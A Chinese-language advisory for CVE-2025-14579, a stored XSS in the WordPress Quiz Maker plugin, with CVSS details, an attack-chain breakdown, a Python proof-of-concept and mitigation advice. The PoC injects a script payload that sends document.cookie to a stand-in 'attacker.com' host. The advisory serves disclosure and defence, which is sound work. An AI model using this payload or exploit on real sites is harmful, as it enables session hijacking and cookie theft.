CVE-2025-14579 WordPress Quiz Maker插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14579

漏洞类型

存储型XSS

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

WordPress Quiz Maker插件

漏洞概述

CVE-2025-14579是WordPress Quiz Maker插件中的一个存储型跨站脚本（Stored XSS）漏洞。该插件在6.7.0.89之前版本中，对部分设置参数缺乏充分的输入清理（sanitization）和输出转义（escaping）处理。漏洞允许具有高权限的用户（如管理员）在插件的特定设置字段中注入恶意JavaScript代码。由于攻击代码被永久存储在数据库中，当其他用户访问包含这些设置内容的页面时，恶意脚本会自动执行，从而实现会话劫持、Cookie窃取、钓鱼攻击等恶意行为。值得注意的是，即使在WordPress多站点（multisite）环境中unfiltered_html能力被禁用，攻击者仍可利用此漏洞进行XSS攻击，因为插件本身未实施适当的安全过滤措施。该漏洞CVSS评分为4.8，属于中等严重程度，但可能被攻击者用于权限提升或进一步渗透。

技术细节

Quiz Maker插件的存储型XSS漏洞源于其设置页面未对用户输入进行正确的安全处理。攻击者通过WordPress后台访问Quiz Maker的设置面板，在特定配置字段（如Quiz标题、问题描述、结果页面等）中注入包含JavaScript代码的恶意payload。这些数据在保存时未经过滤直接存入数据库，当其他用户访问前端Quiz页面或管理后台相关页面时，数据被读取并直接渲染到HTML中，导致注入的JavaScript代码被浏览器执行。攻击者可利用此漏洞窃取管理员会话令牌、修改页面内容进行钓鱼、植入进一步的攻击负载。由于插件在多个位置都存在类似的安全缺陷，攻击面较大。此漏洞的利用需要攻击者拥有至少管理员级别权限，但在某些配置下可能通过其他漏洞组合实现权限提升。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标WordPress网站，确认安装了存在漏洞的Quiz Maker插件版本（< 6.7.0.89）

STEP 2

步骤2

获取高权限账户：攻击者获取目标站点的管理员或高权限用户凭据，可通过暴力破解、钓鱼或利用其他漏洞实现

STEP 3

步骤3

注入恶意代码：攻击者登录WordPress后台，访问Quiz Maker插件设置页面，在配置字段中注入包含JavaScript代码的XSS payload

STEP 4

步骤4

持久化存储：恶意payload随设置数据一起保存到数据库中，由于缺乏过滤处理，代码被永久存储

STEP 5

步骤5

触发执行：当其他管理员或用户访问Quiz Maker相关页面时，存储的JavaScript代码被读取并作为HTML的一部分渲染，浏览器执行恶意脚本

STEP 6

步骤6

恶意行为执行：XSS payload可窃取用户Cookie、会话令牌，进行钓鱼攻击，或作为进一步攻击的跳板

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-14579 PoC - WordPress Quiz Maker Stored XSS
# Target: WordPress site with vulnerable Quiz Maker plugin < 6.7.0.89

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "admin"
PASSWORD = "admin_password"

def get_nonce(session, url):
    """Extract WordPress nonce from page"""
    response = session.get(url)
    match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', response.text)
    return match.group(1) if match else None

def exploit_stored_xss():
    """Exploit stored XSS in Quiz Maker settings"""
    session = requests.Session()
    
    # Step 1: Login to WordPress admin
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/admin.php?page=quiz-maker"
    }
    session.post(login_url, data=login_data)
    
    # Step 2: Get nonce for Quiz Maker settings
    settings_url = f"{TARGET_URL}/wp-admin/admin.php?page=quiz-maker"
    nonce = get_nonce(session, settings_url)
    
    # Step 3: Inject malicious JavaScript payload in settings
    # XSS payload: <script>alert(document.cookie)</script>
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    
    settings_data = {
        '_wpnonce': nonce,
        'quiz_maker_settings[quiz_title]': f'Test Quiz {xss_payload}',
        'quiz_maker_settings[submit]': 'Save Changes'
    }
    
    response = session.post(settings_url, data=settings_data)
    
    # Step 4: Verify XSS is stored and triggered when page is accessed
    verify_url = f"{TARGET_URL}/wp-admin/admin.php?page=quiz-maker"
    response = session.get(verify_url)
    
    if xss_payload in response.text:
        print("[+] XSS payload successfully stored!")
        print("[+] Payload will execute when settings page is viewed")
        return True
    else:
        print("[-] XSS payload not found in response")
        return False

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

Quiz Maker WordPress插件 < 6.7.0.89

防御指南

临时缓解措施

在完成安全更新之前，可采取以下临时缓解措施：1）限制Quiz Maker插件的访问权限，仅允许受信任的管理员使用；2）在Web应用防火墙（WAF）中配置规则，检测和阻止包含<script>标签的请求；3）禁用非必要用户的编辑权限；4）启用WordPress的REST API访问限制；5）考虑暂时禁用Quiz Maker插件，待官方修复版本发布后再重新启用；6）加强对管理员账户的监控，及时发现异常操作。